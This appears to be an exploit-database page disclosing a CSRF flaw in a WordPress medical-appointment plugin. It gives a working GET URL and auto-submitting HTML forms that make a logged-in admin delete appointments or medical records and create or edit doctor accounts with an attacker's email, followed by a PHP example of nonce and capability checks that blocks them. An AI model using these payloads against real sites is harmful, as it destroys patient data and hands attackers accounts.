## https://sploitus.com/exploit?id=WPEX-ID:E0741E2C-C529-4815-8744-16E01CDB0AED
Make a logged-in admin open the following URL to make them delete the appointment with ID 1: https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=appointment_delete&id=1
Make a logged-in admin open a page with the HTML code below.
To make them delete the medical record with ID 1:
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
<input type="text" name="route_name" value="medical_records_delete"/>
<input type="text" name="id" value="1">
<input type="submit" value="submit">
</form>
</body>
To make them create a new doctor:
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
<input type="text" name="user_email" value="attacker@domain.com">
<input type="text" name="first_name" value="Attacker">
<input type="text" name="last_name" value="Via CSRF">
<input type="text" name="mobile_number" value="1">
<input type="text" name="gender" value="other">
<input type="submit" value="submit">
</form>
</body>
To edit an existing doctor, add the ID and the correct email to the code above, e.g.:
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
<input type="text" name="ID" value="8">
<input type="text" name="user_email" value="attacker@domain.com">
<input type="text" name="first_name" value="Attacker">
<input type="text" name="last_name" value="Via CSRF">
<input type="text" name="mobile_number" value="1">
<input type="text" name="gender" value="other">
<input type="submit" value="submit">
</form>
</body>
(This will change their name, mobile number and gender, as well as reset their specialisation etc.)
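The defensive counterpart to the requests above, as an added example (not code from the plugin or from the original advisory): WordPress AJAX handlers that refuse state-changing routes over GET and require a per-route nonce plus a capability check on POST. The handler names, the `example_route_` nonce action and the `manage_options` capability are assumptions; the two route names are the ones shown on this page.

```php
<?php
// Added example: hypothetical handlers, not the plugin's own code.
// Assumed names: example_ajax_get(), example_ajax_post(), nonce action
// 'example_route_<route>', capability 'manage_options'.

// Routes from this page that change data and therefore need CSRF protection.
const EXAMPLE_WRITE_ROUTES = array( 'appointment_delete', 'medical_records_delete' );

add_action( 'wp_ajax_ajax_get', 'example_ajax_get' );
add_action( 'wp_ajax_ajax_post', 'example_ajax_post' );

function example_route_name() {
    return isset( $_REQUEST['route_name'] )
        ? sanitize_key( wp_unslash( $_REQUEST['route_name'] ) )
        : '';
}

function example_ajax_get() {
    // A GET can be triggered by any link or image tag the admin's browser
    // loads, so write routes are rejected here outright.
    if ( in_array( example_route_name(), EXAMPLE_WRITE_ROUTES, true ) ) {
        wp_send_json_error( array( 'message' => 'Use POST with a nonce.' ), 405 );
    }
    // ... read-only routes would be dispatched here ...
    wp_send_json_success();
}

function example_ajax_post() {
    $route = example_route_name();

    // 1. CSRF check: the nonce is tied to the user's session and to this
    //    route, so an auto-submitting form on another origin cannot supply it.
    //    The admin page emits it with wp_create_nonce( 'example_route_' . $route ).
    if ( ! check_ajax_referer( 'example_route_' . $route, '_ajax_nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
    }

    // 2. Authorization check: a valid nonce proves intent, not privilege.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    // ... dispatch $route with the validated $id here ...
    wp_send_json_success( array( 'route' => $route, 'id' => $id ) );
}
```

With these checks in place, the auto-submitting forms above would receive a 403 because they carry no `_ajax_nonce`, and the GET delete URL would receive a 405.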